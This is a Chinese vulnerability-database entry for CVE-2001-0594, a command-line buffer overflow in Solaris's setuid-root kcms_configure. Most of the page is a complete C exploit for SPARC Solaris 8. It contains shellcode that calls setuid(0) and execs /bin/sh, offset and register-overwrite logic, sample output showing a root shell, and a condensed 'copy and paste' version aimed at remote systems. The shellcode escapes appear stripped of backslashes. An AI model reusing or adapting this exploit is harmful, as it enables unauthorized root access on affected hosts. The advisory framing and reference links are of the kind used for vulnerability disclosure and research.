Solaris kcms_configure获取额外特权漏洞
漏洞ID | 1106281 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2001-04-09 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2001-0594 |
CNNVD-ID | CNNVD-200108-012 |
漏洞平台 | Solaris | CVSS评分 | 4.6 |
|漏洞来源
|漏洞详情
包含在Solaris7和8版本中的kcms_configure存在漏洞。本地攻击者借助命令行参数中的缓冲区溢出获取额外的特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2558/info
The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.
An exploit for x86 Solaris is available to attackers.
/* kcms_configure -o -S command line buffer overflow, SPARC/solaris 8
*
* http://www.securityfocus.com/bid/2558
*
* Coded June 22, 2002 by Adam Slattery. Phear. The vulnerability
* was discovered a long time ago (04/2001), but there haven't been
* any published sparc exploits as far as I know (only x86).
*
* Adam Slattery <[email protected]>
*
* DESCRIPTION:
*
* The i386/solaris 8 exploit by eEye (Riley Hassell) was trivial. A
* sparc version is somewhat more complicated, but not daunting. Because
* of the location of the overflow in the program, quite a bit of code
* gets executed before the second return (which is the jump to
* shellcode in a sparc overflow). Some of this code relies on the
* registers being set, and we're overwriting the saved registers
* when we overflow the stack buffer. To remedy this situation we
* need to overflow the stack very carefully because in the process
* of overwriting the saved i7 register (return address), we overwrite
* the l0-07 and i0-i6 [fp] registers. The code that gets executed before
* the second return makes use of a few of these overwritten registers.
* So... we overwrite these saved registers with a "good" address that
* points to a pointer, so pretty much any code using values in the
* registers won't try to access illegal memory and cause a seg fault.
* It may sound sketchy, but it works.
*
* USAGE:
*
* gcc kcms_sparc.c -o kcms_sparc
* ./kcms_sparc [offset] [ptr addr]
*
* $ ./kcms_sparc
* ret address: 0xffbee4f8 [3036] ptr address: 0xffbeecf8 buflen: 1085
* # id
* uid=0(root) gid=100(users)
*
*
* The default offset (3036) should work. 4800 also works. Read the note
* by the address calculations to see why (there are 2 buffers). Even
* though it's a 1024 byte buffer, there aren't too many nops left in
* the second buffer when everything is set so if you have to search
* for the offet by hand, use increments of 64.
* The [ptr addr] is an address in memory that points to a pointer.
* This is loaded into some of the registers that get used before the
* program jumps into shell code. If the default (0xffbeecf8) doesn't
* work you, you probably won't be able to make a guess, so you'll
* have to whip out gdb. If you don't have r00t (most likely), you'll
* have to use a copy (non-suid) of kcms_configure and LD_PRELOAD a lib
* to return 0 for geteuid/getegid (so it wonn't detect it's not uid 0).
*
*
* Thanks: optyx, t12, worms, miah, Sun Microsystems, Kodak...
*
* Langrets - thanks for making me cookies after I had surgery, which
* was the week before I actually released this. They tasted 31337++.
*
*
* random greetz: xexen, rogers, kanu, cyun, cua0, dap, f3tus, xaiou,
* langrets, janebond, applejacks, wisdmckr3, cbo2000
*
* stupid people: #legions (esp. digiebola, pr00f, gridmark),
* MIT, Stanford, Olin (those bastards all turned me down)
*/
#include <stdio.h>
#include <unistd.h>
/* some .s asm code was used from dopesquad.net */
u_char shellcode[] = /* [email protected] */
//setuid(0)
"x90x1bxc0x0f" /* xor %o7,%o7,%o0 */
"x82x10x20x17" /* mov 23,%g1 */
"x91xd0x20x08" /* ta 8 */
/* For some messed up reason it doesn't seem to work if i
* use one or the other syscall, but it does if i use both. I
* don't feel like playing with shellcode anymore right now, and
* this works, so I don't care.
*/
//setreuid(0,0)
"x92x1ax40x09" /* xor %o1,%o1,%o1 */
"x82x10x20xca" /* mov 202, %g1 */
"x91xd0x20x08" /* ta 8 */
//exec(/bin/sh)
"x21x0bxd8x9a" /* sethi %hi(0x2f626800), %l0 */
"xa0x14x21x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */
"x23x0bxdcxda" /* sethi %hi(0x2f736800), %l1 */
"x90x23xa0x10" /* sub %sp, 16, %o0 */
"x92x23xa0x08" /* sub %sp, 8, %o1 */
"x94x1bx80x0e" /* xor %sp, %sp, %o2 */
"xe0x3bxbfxf0" /* std %l0, [%sp - 16] */
"xd0x23xbfxf8" /* st %o0, [%sp - 8] */
"xc0x23xbfxfc" /* st %g0, [%sp - 4] */
"x82x10x20x3b" /* mov 59, %g1 */
"x91xd0x20x08" /* ta 8 */
;
u_char NOP[4] = "xa6x1cxc0x13"; /* xor %l3, %l3, %l3 */
/* we need 1085 bytes to overwrite saved i7 */
/* the vulnerable buffer is a 1024 bytes long */
#define BIGBUF 1086
/* Offsets to saved registers in relation to the bottom of the buffer: */
#define l0_OFFSET 1025
#define i7_OFFSET 1081
/* figure out where the stack starts so we have a rough guestimation */
u_long get_sp(void)
{
__asm__("mov %sp, %i0n");
}
int main(int argc, char **argv)
{
u_char buf[BIGBUF+6];
int i, offset;
u_long addr;
u_long paddr;
if(argc > 1)
if(!strcmp(argv[1], "-h") || !strcmp(argv[1], "--help"))
{
printf("%s [retaddr offset] [ptraddr]n", argv[0]);
exit(0);
}
/* Calculate the return address to put in i7.
* 3036 should dump us into the nops just fine.
* We actually have 2 different windows with about 900 bytes
* of nops each because the buffer we overflow gets copied into
* another 1024 byte buffer directly below it on the stack.
* This actually overwrites the first couple hundred nops,
* but we still have a bunch, so it's ok.
*/
addr = get_sp();
if(argc > 1)
offset = atoi(argv[1]);
else
offset = 3036;
addr -= offset;
if(argc > 2)
paddr = strtoul(argv[2], NULL, 0);
else
paddr = 0xffbeecf8; //0xffbee3e8 might work too;
memset(buf, 255, BIGBUF);
/* Copy NOPS until ~80 bytes before the end of vulnbuf */
for(i = 1; i < 940 ; i+=4)
memcpy(buf+i, NOP, 4);
/* Copy shellcode */
memcpy(buf+i, shellcode, strlen(shellcode));
/* because so much code gets executed before the second return, we
* have to overwrite the stack with very precise data. Finding the
* right values takes some time in gdb, but it turns out we just need
* a value that points to some valid memory that points somewhere else.
* Additionally, this address + 8 needs to do the same. So we need a
* string of pointers to pointers. Luckily, this happens quite
* frequently by blind luck. It just takes some searching in gdb.
*
* We just fill all the registers (except i7) with this address. I
* started with just i1, i4, and i6(fp), and this worked great
* testing as a normal user, but the program's execution is slightly
* different when it runs as root (mkdir doesn't fail :), so it was
* seg faulting and i couldn't figure out why (debugging suid binaries
* as a normal user is impossible :). So instead of wrapping all these
* damn library calls through my LD_PRELOADed geteuid() library, I
* tried filling all the registers. b00m. It worked.
*/
/* l0-l7 and i0-i6(fp) */
for(i=l0_OFFSET ; i < i7_OFFSET ; i+=4)
memcpy(&buf[i], &paddr, 4);
/* i7, return address */
memcpy(&buf[i7_OFFSET], &addr, 4);
/* Null terminate */
buf[i7_OFFSET+4] = ' ';
printf("ret address: 0x%x [%d] ptr address: 0x%x len: %dn",
addr, offset, paddr, strlen(buf));
/* b00m! */
execl("/usr/X/bin/kcms_configure", "pine", "-o", "-S",
"blah", buf, NULL);
puts("execl failed");
return 0;
}
#ifdef UGLY_COPY_AND_PASTE_VERSION
// Fits in a single terminal screen, makes it easier to copy&paste
// the exploit to a remote system. Maybe I'm being a little bit too
// nice to the kiddies? It even has a nice smiley face :)
// ... BEGIN ...
#include <stdio.h>
#include <sys/types.h>
u_char shellcode[] =
"x90x1bxc0x0fx82x10x20x17x91xd0x20x08x92x1ax40x09"
"x82x10x20xcax91xd0x20x08x21x0bxd8x9axa0x14x21x6e"
"x23x0bxdcxdax90x23xa0x10x92x23xa0x08x94x1bx80x0e"
"xe0x3bxbfxf0xd0x23xbfxf8xc0x23xbfxfcx82x10x20x3b"
"x91xd0x20x08"; u_char NOP[4]="xa6x1cxc0x13"; u_long
get_sp(void){__asm__("mov %sp, %i0n");}int main(int ac,char **av)
{ u_char buf[1092];int i, offset; u_long addr; u_long pa;
if(ac>1) if(!strcmp(av[1], "-h")||!strcmp(av[1],"--help")) {
printf("%s [retaddr offset] [ptraddr]n", av[0]); exit(0); }
addr=get_sp(); if( ac>1) offset=atoi(av[1]); else offset=3036;
addr-=offset;if(ac >2)pa=strtoul(av[2],NULL,0);else pa=0xffbeecf8;
memset(buf ,255,1086);for (i=1;i<940;i+=4) memcpy(buf+i,NOP,4);
memcpy(buf+ i,shellcode ,strlen(shellcode)); for(i=1025;i<1081;
i+=4) memcpy( &buf[i], &pa, 4); memcpy(&buf[1081],
&addr,4);buf[1085]=' ';printf("ret: 0x%x [%d] ptr: 0x%x len: %dn",
addr,offset,pa,strlen(buf)); execl("/usr/X/bin/kcms_configure",
"pine","-o","-S","blah",buf,NULL); puts("exec failed"); return 0; }
// ... END ...
#endif
|参考资料
来源:XF
名称:solaris-kcms-command-bo(6359)
链接:http://xforce.iss.net/static/6359.php
来源:BUGTRAQ
名称:20010409Solariskcms_configurevulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0140.html
来源:BID
名称:2558
链接:http://www.securityfocus.com/bid/2558
来源:USGovernmentResource:oval:org.mitre.oval:def:7
名称:oval:org.mitre.oval:def:7
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:7
来源:USGovernmentResource:oval:org.mitre.oval:def:65
名称:oval:org.mitre.oval:def:65
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:65
相关推荐: WoltLab Burning Board Lite ADDENTRY.PHP SQL Injection Vulnerability
WoltLab Burning Board Lite ADDENTRY.PHP SQL Injection Vulnerability 漏洞ID 1097313 漏洞类型 Input Validation Error 发布时间 2005-01-10 更新时间 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666